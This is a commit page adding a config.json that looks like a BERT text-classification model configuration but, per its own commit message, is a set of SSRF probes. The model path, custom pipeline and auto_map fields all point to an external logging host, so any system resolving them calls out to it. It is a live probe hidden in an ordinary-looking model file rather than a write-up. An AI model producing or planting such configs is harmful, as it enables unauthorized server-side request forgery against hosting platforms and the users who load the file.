FIRSTACCOUNT69 commited on
Commit
adc22df
·
verified ·
1 Parent(s): a1f3d4a

Add config.json with SSRF probes

Browse files
Files changed (1) hide show
  1. config.json +22 -0
config.json ADDED
@@ -0,0 +1,22 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "model_type": "bert",
3
+ "architectures": [
4
+ "BertForSequenceClassification"
5
+ ],
6
+ "tokenizer_class": "BertTokenizer",
7
+ "pretrained_model_name_or_path": "https://firstaccount69-ssrf-probe.hf.space/log?ssrf=config_pretrained_path",
8
+ "model_name_or_path": "https://firstaccount69-ssrf-probe.hf.space/log?ssrf=config_model_name_path",
9
+ "custom_pipelines": {
10
+ "text-classification": {
11
+ "impl": "https://firstaccount69-ssrf-probe.hf.space/log?ssrf=custom_pipeline_impl",
12
+ "pt": [
13
+ "BertForSequenceClassification"
14
+ ],
15
+ "tf": []
16
+ }
17
+ },
18
+ "auto_map": {
19
+ "AutoModel": "https://firstaccount69-ssrf-probe.hf.space/log?ssrf=auto_map_model",
20
+ "AutoConfig": "https://firstaccount69-ssrf-probe.hf.space/log?ssrf=auto_map_config"
21
+ }
22
+ }